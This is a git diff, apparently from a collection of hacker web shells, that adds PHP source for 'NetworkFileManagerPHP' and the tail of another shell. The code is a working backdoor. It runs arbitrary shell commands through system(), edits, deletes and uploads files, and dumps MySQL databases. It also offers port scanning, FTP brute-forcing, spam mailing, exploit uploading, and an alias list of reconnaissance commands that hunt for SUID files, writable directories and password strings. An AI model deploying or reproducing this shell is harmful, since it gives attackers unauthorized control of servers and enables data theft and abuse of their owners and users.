+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur num?rique ? la taille du fichier ? scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure ? 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
+  echo "<br><center>All the data in these tables:<br> ".$tblsv." were putted to this file:<br><br></center><table border='0' align='center' cellpadding='0' cellspacing='0'><col width=1 bgcolor='#2D7DA7'><col valign=center><col width=1 bgcolor='#2D7DA7'><col valign=center align=right><col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>File</b></font></td><td></td><td bgcolor='#338CBD' align=center class=texte><font size=1><b>Size</b></font></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  reset($f_nm);
+
+  while (list($i,$val)=each($f_nm)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3'; }
+
+   echo "<tr><td></td><td bgcolor=".$coul." class=texte>&nbsp;<a href='".$val."' class=link target='_blank'>".$val."&nbsp;</a></td><td></td>";
+
+   $fz_tmp=filesize($val);
+
+   if ($fcut && ($fz_tmp > $fz_max)) {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1 color=red>".$fz_tmp." Octets</font>&nbsp;</td><td></td></tr>";
+
+   } else {
+
+    echo "<td bgcolor=".$coul." class=texte>&nbsp;<font size=1>".$fz_tmp." bites</font>&nbsp;</td><td></td></tr>";
+
+   }
+
+   echo "<tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+  }
+
+  echo "</table><br>";
+
+  echo $footer;exit;
+
+ }
+
+
+
+ if ($sqlaction=='connect') {
+
+  if(!@mysql_connect($dbhost,$dbuser,$dbpass)) {
+
+   echo $header."<br><center><font color=red><b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if(!@mysql_select_db($dbbase)) {
+
+   echo $header."<br><center><font color=red><<b>Unable to connect! Check your data input!</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+
+
+  if ($secu==1) {
+
+   if (!file_exists($secu_config)) {
+
+    $fp=fopen($secu_config,"w");
+
+    fputs($fp,"<?php\n");
+
+    fputs($fp,"\$dbhost='$dbhost';\n");
+
+    fputs($fp,"\$dbbase='$dbbase';\n");
+
+    fputs($fp,"\$dbuser='$dbuser';\n");
+
+    fputs($fp,"\$dbpass='$dbpass';\n");
+
+    fputs($fp,"?>");
+
+    fclose($fp);
+
+   }
+
+   include($secu_config);
+
+  } else {
+
+   if (file_exists($secu_config)) { unlink($secu_config); }
+
+  }
+
+
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  $tables=mysql_list_tables($dbbase);
+
+  $nb_tbl=mysql_num_rows($tables);
+
+
+
+  echo $header."<script language='javascript'> function checkall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=true;i=i+1;} } function decheckall() { var i=0;while (i < $nb_tbl) { a='tbls['+i+']';document.formu.elements[a].checked=false;i=i+1;} } </script><center><br><b>Choose tables you need to dump!</b><form action='' method='post' name=formu><input type='hidden' name='sqlaction' value='save'><input type='hidden' name='dbhost' value='$dbhost'><input type='hidden' name='dbbase' value='$dbbase'><input type='hidden' name='dbuser' value='$dbuser'><input type='hidden' name='dbpass' value='$dbpass'><DIV ID='infobull'></DIV><table border='0' width='400' align='center' cellpadding='0' cellspacing='0' class=texte><col width=1 bgcolor='#2D7DA7'><col width=30 align=center valign=center><col width=1 bgcolor='#2D7DA7'><col width=350> <col width=1 bgcolor='#2D7DA7'><tr><td bgcolor='#2D7DA7' colspan=5></td></tr><tr><td></td><td bgcolor='#336699'><input type='checkbox' name='selc' alt='Check all' onclick='if (document.formu.selc.checked==true){checkall();}else{decheckall();}')\"></td><td></td><td bgcolor='#338CBD' align=center><B>Table names</b></td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+
+
+  $i=0;
+
+  while ($i < mysql_num_rows ($tables)) {
+
+   $coul='#99CCCC';
+
+   if ($i % 2) { $coul='#CFE3E3';}
+
+   $tb_nom=mysql_tablename ($tables,$i);
+
+   echo "<tr><td></td><td bgcolor='".$coul."'><input type='checkbox' name='tbls[".$i."]' value='".$tb_nom."'></td><td></td><td bgcolor='".$coul."'>&nbsp;&nbsp;&nbsp;".$tb_nom."</td><td></td></tr><tr><td bgcolor='#2D7DA7' colspan=5></td></tr>";
+
+   $i++;
+
+  }
+
+
+
+  mysql_close();
+
+  echo "</table><br><br><table align=center border=0><tr><td align=left class=texte> <hr> <input type='radio' name='savmode' value='csv'>
+
+  Save to csv (*.<i>csv</i>)<br> <input type='radio' name='savmode' value='sql' checked>
+
+  Save to Sql (*.<i>sql</i>)<br> <hr> <input type='radio' name='opt' value='1' checked>
+
+  Save structure and data<br> <input type='radio' name='opt' value='2'>
+
+  Save structure only<br> <input type='radio' name='opt' value='3'>
+
+  Save data only<br> <hr> <input type='Checkbox' name='drp_tbl' value='1' checked>
+
+  Rewrite file if exists<br>  <input type='Checkbox' name='ecraz' value='1' checked>
+
+  Clear database after dump<br> <input type='Checkbox' name='f_tbl' value='1'>
+
+  Put each table to a separate file<br> <input type='Checkbox' name='f_cut' value='1'>
+
+  Maximum dump-file size: <input type='text' name='fz_max' value='200000' class=form>
+
+  Octets<br> <input type='Checkbox' name='file_type' value='1'>
+
+  Gzip.<br>
+
+  </td></tr></table><br><br><input type='submit' value=' Dump:) ' class=form></form></center>$footer";
+
+  exit;
+
+ }
+
+
+
+// SQL actions END
+
+
+
+ if(file_exists($secu_config)) {
+
+  include ($secu_config);
+
+  $ck="checked";
+
+ } else {
+
+  $dbhost="localhost";
+
+  $dbbase="";
+
+  $dbuser="root";
+
+  $dbpass="";
+
+  $ck="";
+
+ }
+
+
+
+ echo $header."
+
+<center><br><br>
+
+<table width=620 cellpadding=0 cellspacing=0 align=center>
+
+ <col width=1>
+
+ <col width=600>
+
+ <col width=1>
+
+ <tr>
+
+  <td></td>
+
+  <td align=left class=texte>
+
+   <br>
+
+   <form action='' method='post'>
+
+   <input type='hidden' name='sqlaction' value='connect'>
+
+   <table border=0 align=center>
+
+    <col>
+
+    <col align=left>
+
+    <tr>
+
+     <td colspan=2 align=center style='font:bold 9pt;font-family:verdana;'>Enter data to connect to MySQL server!<br><br></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Server address:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbhost' SIZE='30' VALUE='localhost' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Base name:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbbase' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Login:</td>
+
+     <td><INPUT TYPE='TEXT' NAME='dbuser' SIZE='30' VALUE='root' class=form></td>
+
+    </tr>
+
+    <tr>
+
+     <td class=texte>Password</td>
+
+     <td><INPUT TYPE='Password' NAME='dbpass' SIZE='30' VALUE='' class=form></td>
+
+    </tr>
+
+   </table>
+
+   <br> <center> <br><br>
+
+   <input type='submit' value=' Connect ' class=form></center> </form> <br><br>
+
+  </td>
+
+  <td></td>
+
+ </tr>
+
+ <tr>
+
+  <td height=1 colspan=3></td>
+
+ </tr>
+
+</table>
+
+</center>";
+
+
+
+}
+
+// SQL END
+
+
+
+/* main() */
+
+set_time_limit(0);
+
+
+
+if ( $action !="download") print("$HTML");
+
+
+
+if (!isset($cm)) {
+
+ if (!isset($action)) {
+
+  if (!isset($tm)) { $tm = getcwd(); }
+
+  $curdir = getcwd();
+
+  if (!@chdir($tm)) exit("<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert>Access to directory is denied, see CHMOD.</td></tr></table>");
+
+  getdir();
+
+  chdir($curdir);
+
+  $supsub = $gdir[$j-1];
+
+  if (!isset($tm) ) { $tm=getcwd();}
+
+  readdirdata($tm);
+
+ } else {
+
+  switch ($action) {
+
+   case "view":
+
+    viewfile($tm,$fi);
+
+    break;
+
+   case "delete":
+
+    echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fi</b> was deleted successfully.</font></center></td></tr></table>";
+
+    deletef($tm);
+
+    break;
+
+   case "download":
+
+   if (isset($fatt) && strlen($fatt)>0) {
+
+    $attach=$fatt;
+
+    header("Content-type: text/plain");
+
+   }
+
+   else {
+
+    $attach=$fi;
+
+    header("Content-type: hackru");
+
+   }
+
+   header("Content-disposition: attachment; filename=\"$attach\";");
+
+   readfile($tm."/".$fi);
+
+   break;
+
+   case "download_mail":
+
+   download_mail($tm,$fi);
+
+   break;
+
+   case "edit":
+
+   editfile($tm,$fi);
+
+   break;
+
+  case "save":
+
+   savefile($tm,$fi);
+
+   break;
+
+  case "uploadd":
+
+   uploadtem();
+
+   break;
+
+  case "up":
+
+   up($tm);
+
+   break;
+
+  case "newdir":
+
+   newdir($tm);
+
+   break;
+
+  case "createdir":
+
+   cdir($tm);
+
+   break;
+
+  case "deldir":
+
+   deldir();
+
+   break;
+
+  case "feedback":
+
+   mailsystem();
+
+   break;
+
+  case "upload":
+
+   upload();
+
+   break;
+
+  case "help":
+
+   help();
+
+   break;
+
+  case "ftp":
+
+   ftp();
+
+   break;
+
+  case "portscan":
+
+   portscan();
+
+   break;
+
+  case "sql":
+
+   sql();
+
+   break;
+
+  case "tar":
+
+   tar();
+
+   break;
+
+  case "bash":
+
+   bash();
+
+   break;
+
+  case "passwd":
+
+   passwd();
+
+   break;
+
+  case "exploits":
+
+   exploits($dir);
+
+   break;
+
+  case "upload_exploits":
+
+   upload_exploits($dir);
+
+   break;
+
+  case "upload_exploitsp":
+
+   upload_exploitsp($dir);
+
+   break;
+
+  case "arhiv":
+
+   arhiv($tm,$pass);
+
+   break;
+
+  case "crypte":
+
+   crypte();
+
+   break;
+
+  case "decrypte":
+
+   decrypte();
+
+   break;
+
+  case "brut_ftp":
+
+   brut_ftp();
+
+   break;
+
+  case "copyfile":
+
+   copyfile($tm,$fi);
+
+   break;
+
+  case "down":
+
+   down($dir);
+
+   break;
+
+  case "downfiles":
+
+   downfiles($dir);
+
+   break;
+
+  case "spam":
+
+   spam();
+
+   break;
+
+  }
+
+ }
+
+} else {
+
+ echo "<br><table CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFFF BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center>Done: $cm</center><pre>";
+
+ echo system($cm);
+
+ echo "</pre></td></tr></table>";
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "ftp" && $action != "portscan" && $action != "sql" && $action != "tar"  && $action != "bash" && $action != "anonimmail") {
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Command prompy (like bash):</b></td></tr><tr><td valign=top><input type=text name=cm size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ $perdir = @permissions(fileperms($tm));
+
+ if ($perdir && $perdir[7] == "w" && isset($tm)) uploadtem();
+
+ else echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to upload files to current directory</b></font></td></tr></table>";
+
+ if ($perdir[7] == "w" && isset($tm)) {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method = 'POST' action = '$PHP_SELF?tm=$tm&action=createdir'><tr><td align=center colspan=2 class=pagetitle><b>Create directory:</b></td></tr><tr><td valign=top><input type=text name='newd' size=90 class='inputbox'></td><td valign=top><input type=submit value='GO' class=button1 $style_button></td></tr></form></table>";
+
+ } else {
+
+  echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Unable to create directory here</b></td></tr></table>";
+
+ }
+
+}
+
+
+
+if ($action !="download" && $action != "down" && $action != "spam" && $action != "brut_ftp" && $action != "download_mail" && $action != "copyfile" && $action != "crypte" && $action != "decrypte" && $action != "exploits" && $action != "arhiv" && $action != "download_mail2" && $action != "feedback" && $action != "uploadd"  && $action != "newdir" && $action != "edit" && $action != "view" && $action != "help" && $action != "aliases" && $action != "portscan" && $action != "ftp" && $action != "sql" && $action != "tar" && $action != "bash" && $action != "anonimmail") {
+
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form method='get' action='$PHP_SELF'><tr><td align=center colspan=2 class=pagetitle><b>Ready usefull requests to unix server:</b></td></tr><tr><td valign=top width=95%><select name=cm class='inputbox'>";
+
+ foreach ($aliases as $alias_name=>$alias_cmd) echo "<option size=80 class='inputbox'>$alias_name</option>";
+
+ echo "</select></td><td valign=top align=right width=5%><input type=submit value='GO' class=button1 $style_button></td></tr></table></form>";
+
+}
+
+
+
+if ( $action !="download") echo nfm_copyright();
+
+?>
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 
diff --git a/xakep-shells/PHP/nfm.php.php.txt b/xakep-shells/PHP/nfm.php.php.txt
new file mode 100644
index 0000000..a07b387
--- /dev/null
+++ b/xakep-shells/PHP/nfm.php.php.txt
@@ -0,0 +1,3086 @@
+<?
+error_reporting(5);
+/*
+$use_md5=0; // êðèïòîâàòü ïàðîëü ïî md5 èëè íåò? // 
+$uname="nfm";
+$upass="q1w2e3"; 
+
+
+if (isset($PHP_AUTH_USER) && ($PHP_AUTH_USER==$uname)) {
+ if ($use_md5) {
+  if (md5($PHP_AUTH_PW) != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ } else {
+  if ($PHP_AUTH_PW != $upass) { Header('WWW-Authenticate: Basic realm="'.$title.'"');Header('HTTP/1.0 401 Unauthorized');exit; }
+ }
+} else {
+ Header('WWW-Authenticate: Basic realm="'.$title.'"');
+ Header('HTTP/1.0 401 Unauthorized');
+ exit;
+} */
+if ($action != "download" && $action != "view" ):
+?>
+
+<?
+
+/* Âàøå ìûëî äëÿ îòïðàâêè ôàéëîâ, óêàæèòå ñâîå*/
+$demail ="âàøå ìûëî";
+
+/* ïîø¸ë êîíôèã */
+$title="NetworkFileManagerPHP";
+$ver="1.8.private (beta)";
+$sob="Cîáñòâåííîñòü <b><u>channel #hack.ru</u></b>";
+$id="0000001";
+
+/* FTP-áðóò */
+$filename="/etc/passwd";
+$ftp_server="localhost";
+/* ñêàíåð ïîðòîâ */
+$min="1";
+$max="65535";
+
+/* Àëèàñû */
+$aliases=array(
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
+'find / -type f -name config.inc.php' => 'find config.inc.php files',
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find / -perm -2 -ls' => 'find writable directories and files',
+'ls -la' => '---------------------------------------------------------',
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'  
+);
+
+/* Ïîðòû ñ íàèìåíîâàíèÿìè */
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
